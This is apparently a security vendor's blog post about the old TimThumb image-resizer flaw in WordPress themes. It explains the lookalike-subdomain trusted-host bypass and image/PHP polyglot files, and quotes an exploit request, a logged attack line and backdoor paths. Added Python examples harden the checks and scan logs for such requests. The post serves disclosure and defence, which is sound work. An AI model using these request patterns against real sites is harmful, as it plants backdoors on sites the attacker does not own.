TimThumb Assaults: The Scale of Legacy Malware Infections

These days, we consider a malware campaign large if it affects a couple of thousand websites. However, back in the day when Sucuri first began its operations, the scale of infections was significantly larger, and it was quite typical to see hundreds of thousands of websites affected by the same malware.

This was mostly because early versions of CMSs weren't very secure but were already popular enough to power millions of websites. Extension developers also didn't bother much about security. The whole ecosystem was very young, and with the lack of alternatives, even amateur plugins and themes had a good chance of being adopted by a large number of websites.

At the time, most CMSs didn't have any serious security plugins. Web application firewalls weren't commonly used outside of corporations. This all led to situations where vulnerabilities resulted in tens (or sometimes even hundreds) of thousands of infected websites within a very short time. Another common source of massive infections was malware that stole website credentials from the computers of webmasters.

Blast From the WordPress Past: TimThumb Vulnerability

One of the most well-known attacks in the WordPress ecosystem during 2011-2014 was the exploitation of the TimThumb vulnerability.

TimThumb was a simple PHP script used for resizing images. Many popular WordPress themes and plugins used this script.

Back in 2011, a vulnerability in this script was discovered which allowed attackers to upload PHP files to websites using TimThumb.

Back in those days, David Dede was busy writing about the newly discovered vulnerability on our blog (yeah, I agree, our vulnerability analysis articles are much better now). In those articles, he described the scope and impact for affected themes, plugins and infections.

TimThumb Exploit Leverages Flawed Implementation

The exploit used TimThumb's feature to create thumbnails of images stored on trusted third-party sites. In order to resize these images, the files needed to be downloaded and stored in a cache directory so that the script didn't have to download them every time.

This feature worked using a simple GET request: timthumb.php?src=http://trusted-site.tld/image.gif

Since these kinds of GET requests can be easily modified to download arbitrary files from the internet, the developer tried to make sure that no files could be erroneously downloaded. To accomplish this, the script checked the header of the file and verified whether the URL matched the list of trusted sites. However, as usually happens, this good idea was "ruined" by a flawed implementation.

Vulnerability Leads to Malicious Code Execution & Backdoors

While checking for a file header may sound like a good idea, it doesn't take into account that PHP treats anything outside of its <?php ... ?> tags as literal output rather than code, so a file can be a valid image and a valid PHP script at the same time. This means that hackers can append malicious PHP code to the end of a real image and their code will be executed whenever the cached file is requested.

This might not be a big problem if the script only downloaded files from trusted sites that are unlikely to host malware. However, TimThumb only checked that the beginning of the URL matched a list of popular websites like:

  • blogger.com
  • flickr.com
  • wordpress.com
  • picasa.com
  • img.youtube.com
  • photobucket.com
  • tinypic.com
  • upload.wikimedia.org

This approach completely neglected the possibility that a URL beginning with "http://blogger.com" might not belong to a blogger.com website.

For example, "http://blogger.com.example.com" or "http://blogger.community.example.com" would successfully pass the check that had been implemented in TimThumb.

Along with a few other thoughtless coding practices, this made the timthumb.php file (sometimes renamed to thumb.php) a perfect penetration point for hackers. Attackers used it to upload backdoors and maintain access to vulnerable websites.

Here are a few examples of uploaded cached backdoors seen from this vulnerability:
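To make both flaws concrete, here is an added Python example (not code from this post or from TimThumb itself) that reproduces the string-prefix check against the trusted list beside a hardened version that parses the URL and compares the real host, and pairs the header-only image check with a scan of the file body for PHP open tags. Function names, the sample URLs and the attacker.example host are this example's own choices; it also covers a user-info (user@host) URL, which is the same prefix weakness but not a case the post mentions.

```python
"""Added example, not code from the Sucuri post or from TimThumb: the
flawed string-prefix check and the header-only image check, each beside
a hardened counterpart. Names and sample values are this example's own."""
from urllib.parse import urlparse

# Default trusted sites, as listed in the post.
TRUSTED_SITES = [
    "blogger.com", "flickr.com", "wordpress.com", "picasa.com",
    "img.youtube.com", "photobucket.com", "tinypic.com", "upload.wikimedia.org",
]


def flawed_src_allowed(src: str) -> bool:
    """Approximation of the original logic: the raw URL string only has to
    begin with http://<trusted-site>, so anything after that prefix is free."""
    return any(src.startswith("http://" + site) for site in TRUSTED_SITES)


def hardened_src_allowed(src: str) -> bool:
    """Parse the URL, take the real host, and accept only an exact trusted
    host or a true subdomain of one (match on a dot boundary)."""
    parsed = urlparse(src)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    host = parsed.hostname.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in TRUSTED_SITES)


# Magic bytes of the image formats a thumbnail script would accept.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
}


def image_type(data: bytes):
    """Header-only check: returns the detected format or None. A valid image
    with PHP appended still passes, which is the weakness the post describes."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def has_embedded_php(data: bytes) -> bool:
    """Complementary body check: PHP only executes what sits inside its open
    tags, so scan the whole file for them rather than trusting the header."""
    lowered = data.lower()
    return b"<?php" in lowered or b"<?=" in lowered


def safe_to_cache(src: str, data: bytes) -> bool:
    """What a hardened fetch path would require before writing to the cache."""
    return (hardened_src_allowed(src)
            and image_type(data) is not None
            and not has_embedded_php(data))


# Constructed samples: a minimal GIF header with a PHP block appended,
# and a clean minimal GIF.
POLYGLOT = b"GIF89a\x01\x00\x01\x00" + b"<?php /* appended code */ ?>"
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00;"

if __name__ == "__main__":
    for url in ("http://blogger.com/a.gif",
                "http://blogger.com.example.com/a.gif",
                "http://blogger.community.example.com/a.gif"):
        print(url, "flawed:", flawed_src_allowed(url),
              "hardened:", hardened_src_allowed(url))
    print("polyglot:", image_type(POLYGLOT), has_embedded_php(POLYGLOT))
```

The hardened host check alone would have blocked the subdomain trick described in this post; the body scan is what closes the image-with-PHP-appended case, since a polyglot file still begins with a legitimate image header.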

/wp-content/themes/PersonalPress/cache/34e3a3a74f6e2d0f236bdd3ba70c0c03.php
/wp-content/plugins/uBillboard/cache/39c7c6041111f8eb22deaa310e1f2f7c.php
/wp-content/uploads/thumb-temp/b712fe675191c264b1326871cd5f3d0c.php

Malicious Subdomains on Compromised Sites

When reviewing website logs back in 2012, it was typical to find requests like the one below, which tried to exploit the TimThumb vulnerability.

95.128.204.x - - [01/May/2012:23:31:33 +0200] "GET //wp-content/themes/LondonLive/thumb.php?src=hxxp://picasa.com.kereny[.]ro/go.php HTTP/1.1" 200 415 example.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"

Hackers created subdomains that matched the sites that TimThumb trusted by default. In the sample seen above, the second-level domain belonged to a real, legitimate website.

Back then, hackers hijacked the DNS settings of thousands of websites and created subdomains that pointed to their own servers, which hosted backdoors and other malware.
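As an added detection example (not from this post), the following Python parses combined-format access log lines, picks out requests to thumb.php or timthumb.php, and flags any whose src= parameter points at a remote host that is not genuinely one of the trusted sites. The log lines are constructed for the example, using documentation IP addresses and the placeholder host attacker.example; the format follows the sample request shown above.

```python
"""Added example, not from the Sucuri post: find TimThumb-style requests in
access logs whose src= host only looks like a trusted site. Sample log lines
are constructed; the IPs and attacker.example are placeholders."""
import re
from urllib.parse import urlparse, parse_qs, unquote

# Default trusted sites, as listed in the post.
TRUSTED_SITES = {
    "blogger.com", "flickr.com", "wordpress.com", "picasa.com",
    "img.youtube.com", "photobucket.com", "tinypic.com", "upload.wikimedia.org",
}

# Leading fields of a combined-format line: client IP, timestamp, request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)
THUMB_RE = re.compile(r"/(?:tim)?thumb\.php$", re.IGNORECASE)


def host_is_trusted(host: str) -> bool:
    """Exact trusted host or a real subdomain of one (dot-boundary match)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SITES)


def find_suspicious(lines):
    """Return (ip, timestamp, src) tuples for thumb.php / timthumb.php requests
    whose remote src host is not a trusted site or its subdomain."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Collapse a doubled leading slash (as in the post's sample) so the
        # path is not mistaken for a //host prefix by urlparse.
        path = "/" + m.group("path").lstrip("/")
        parsed = urlparse(path)
        if not THUMB_RE.search(parsed.path):
            continue
        for src in parse_qs(parsed.query).get("src", []):
            # parse_qs already decoded once; a second unquote exposes
            # double-encoded values as well.
            s = urlparse(unquote(src))
            if s.scheme not in ("http", "https"):
                continue  # local file paths are TimThumb's normal use
            if s.hostname is None or not host_is_trusted(s.hostname):
                hits.append((m.group("ip"), m.group("ts"), src))
    return hits


# Constructed sample log: two exploitation attempts, one legitimate
# thumbnail request, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2012:23:31:33 +0200] "GET //wp-content/themes/LondonLive/thumb.php?src=http://picasa.com.attacker.example/go.php HTTP/1.1" 200 415 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"',
    '198.51.100.4 - - [01/May/2012:23:32:10 +0200] "GET /wp-content/themes/LondonLive/thumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/May/2012:23:33:01 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [01/May/2012:23:34:44 +0200] "GET /wp-content/plugins/uBillboard/timthumb.php?src=http%3A%2F%2Fflickr.com.attacker.example%2Fa.gif HTTP/1.1" 200 415 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for ip, ts, src in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious src={src}")
```

Run against real logs, a hit is worth correlating with the theme or plugin cache directories named earlier in this post, since a successful request leaves the fetched file there under a hashed name.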

Backdoors Found on Thousands of Compromised Sites

During a single year, from March 2012 to February 2013, Sucuri recorded more than 3,000 URLs of backdoors used in TimThumb attacks on our client sites. You can find the full list here: https://pastebin.com/fKJt83ic

Of course, not all of these 3,000+ URLs are unique, and we had registered multiple backdoors associated with the same second-level domains. But still, this includes 1,200+ unique domains which had been compromised by hackers just to serve backdoors off of their subdomains. If seen today, this number would be considered significant for the entire wave of a malware campaign. As you can imagine, the number of compromised sites leveraging the TimThumb vulnerability was larger by orders of magnitude.

TimThumb Usage Statistics

In September 2014, Ben Gillbanks, who took over TimThumb's development in 2009, wrote an article announcing the tool's end of life and support.

Despite the "If you want to use TimThumb, then you do so at your own risk!" alert made by Ben, people are still using it.

I was able to gather some information from our Incident Response logs from January 2017 to August 2019, and the number of sites running the tool was much higher than I expected, especially since it's been defunct for 5 years now.

Checking the 2512 sites we've scanned in 2019 that contain this tool, a total of 89.8% of them were hosting at least one known malicious file. This means that there's still a potential for infection using all the known TimThumb vulnerabilities. It also showcases the importance of only using third-party components that are actively developed and maintained.

Web Security: Leaps and Bounds

So, why bother even releasing this information in 2019? We've compiled this data with the intention of helping you, our reader, appreciate how much more secure the web has become in the past decade.

The growth in the website space is significant. CMS cores don't have significant security issues. Developers of popular themes and plugins have experienced their share of vulnerability-related problems and now write more secure code to protect their install bases. Hosting providers do a better job of isolating accounts and quickly address infections on their clients' sites. More and more researchers review the code of popular CMSs and their extensions, and apply responsible disclosure, which helps to mitigate security problems much faster than a few years ago. Of course, from time to time we still see some massive infections, though they're not nearly on the scale seen even 5 years ago.

Sucuri customers who are behind our website firewall are automatically protected from these kinds of massive infections. If you're the victim of a website compromise or think you may have backdoors or other malicious files, we'd be happy to help remove malware from your website.